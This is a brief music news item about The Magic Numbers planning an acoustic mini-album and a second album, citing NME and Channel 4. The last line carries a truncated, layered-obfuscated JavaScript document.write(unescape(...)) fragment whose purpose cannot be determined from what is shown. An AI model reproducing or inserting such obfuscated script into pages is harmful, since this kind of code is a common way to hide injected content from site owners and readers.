The Magic Numbers have revealed plans to release a mini-album of acoustic songs that were left off their 2005 eponymous debut album reports NME.com.
The band also revealed to NME that they have written most of their second album and that bassist Michele Stodart and percussionist Angela Gannon would be singing more individual songs.
Leader Romeo Stodart told Channel 4's Planet Sound: "I thought (the songs) might make the second album and now they're kinda not fitting with what I'm writing next either. A mini- album might be the answer."
The band play a sold-out ShockWaves NME Awards show at London Brixton Academy on February 16.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
